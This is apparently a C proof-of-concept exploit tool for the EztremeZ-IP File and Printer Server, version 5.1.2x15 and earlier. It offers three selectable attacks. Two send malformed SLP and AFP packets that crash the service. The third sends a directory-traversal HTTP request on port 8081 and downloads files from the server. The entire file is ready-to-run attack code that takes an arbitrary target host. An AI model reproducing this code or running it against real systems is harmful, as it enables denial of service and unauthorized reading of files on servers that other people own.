/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0xffff



int fgetz(u8 *data, int size, FILE *fd);
int slp_send(int sd, struct sockaddr_in *peer, u8 *data, int len);
int putsb(u8 *data, u8 *str);
int putsn(u8 *data, u8 *str);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd      = 0,
            t,
            len,
            attack;
    u16     port;
    u8      url[1024],
            *buff,
            *p,
            *s;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "EztremeZ-IP File and Printer Server <= 5.1.2x15 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host>\n"
            "\n"
            "Attacks:\n"
            " 1 = crash through the SLP service (UDP port 427)\n"
            " 2 = crash through the AFP service (TCP port 548)\n"
            " 3 = limited directory traversal in Zidget/HTTP (TCP port 8081)\n"
            "\n", argv[0]);
        exit(1);
    }

    attack = atoi(argv[1]);
    switch(attack) {
        case 1: port = 427;     break;
        case 2: port = 548;     break;
        case 3: port = 8081;    break;
        default: {
            printf("\nError: wrong attack number (%s)\n", argv[1]);
            exit(1);
            } break;
    }

    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    if(attack == 1) {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        p = buff;
        p += putxx(p, 2,            8);     // version
        p += putxx(p, 2,            8);     // function
        p += putxx(p, 0,            24);    // packet length (later)
        p += putxx(p, 0x0000,       16);    // flags
        p += putxx(p, 0,            24);    // next extension offset
        p += putxx(p, 3,            16);    // XID
        p += putsn(p, "language");          // lang
        p += putxx(p, 0,            16);
        p += putxx(p, 0xffff,       16);    // number of URLs
        p += putxx(p, 0,            8);     // reserved
        p += putxx(p, 0,            16);    // life time
        p += putsn(p, "ezip://bla/bla?SN=bla?PN=bla?UN=bla");

        printf("- send malformed packet\n");
        slp_send(sd, &peer, buff, p - buff);

    } else if(attack == 2) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
         < 0) std_err();

        p = buff;
        p += putxx(p, 0,            8);     // flags
        p += putxx(p, 2,            8);     // command
        p += putxx(p, 1,            16);    // request ID
        p += putxx(p, 0,            32);    // data offset
        p += putxx(p, 0,            32);    // size (later)
        p += putxx(p, 0,            32);    // reserved
        p += putxx(p, 18,           8);     // AFP command
        p += putsb(p, "AFP3.1");            // AFP version
        p += putsb(p, "anything_you_want"); // UAM
        putxx(buff + 8, p - (buff + 16), 32);

        printf("- send malformed data\n");
        send(sd, buff, p - buff, 0);
        if(!timeout(sd, 5)) recv(sd, buff, BUFFSZ, 0);

    } else if(attack == 3) {
        printf(
            "- inser the path of the file you want to download using one of the supported\n"
            "  extensions gif, png, jpg, xml, ico, zip and html, for example\n"
            "  ..\\..\\..\\..\\folder\\file.xml:\n  ");
        fgetz(url, sizeof(url), stdin);
        len = sprintf(buff,
            "GET /%s HTTP/1.0\r\n"
            "Connection: closed\r\n"
            "\r\n", url);

        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
         < 0) std_err();

        printf("- send request\n");
        send(sd, buff, len, 0);

        printf("- receive and visualize data:\n");
        for(s = NULL, p = buff, len = BUFFSZ - 1; len;) {
            t = recv(sd, p, len, 0);
            if(t <= 0) break;
            p += t;
            len -= t;
            *p = 0;
            s = strchr(buff, '\n');
            if(s && (atoi(buff + 9) != 200)) {
                *s = 0;
                printf("\nError: %s\n", buff);
                exit(1);
            }
            s = strstr(buff, "\r\n\r\n");
            if(s) break;
        }
        if(s) {
            fwrite(s + 4, 1, p - (s + 4), stdout);
            while((len = recv(sd, buff, BUFFSZ, 0)) > 0) {
                fwrite(buff, 1, len, stdout);
            }
        }
    }

    printf("\n- done\n");
    close(sd);
    free(buff);
    return(0);
}



int fgetz(u8 *data, int size, FILE *fd) {
    u8      *p;

    fgets(data, size, fd);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
    return(p - data);
}



int slp_send(int sd, struct sockaddr_in *peer, u8 *data, int len) {
    putxx(data + 2, len, 24);
    return(sendto(sd, data, len, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)));
}



int putsb(u8 *data, u8 *str) {
    int     len;

    len = strlen(str);
    if(len > 0xff) exit(1);
    putxx(data, len, 8);
    memcpy(data + 1, str, len);
    return(1 + len);
}



int putsn(u8 *data, u8 *str) {
    int     len;

    len = strlen(str);
    if(len > 0xffff) exit(1);
    putxx(data, len, 16);
    memcpy(data + 2, str, len);
    return(2 + len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << ((bytes - 1 - i) << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


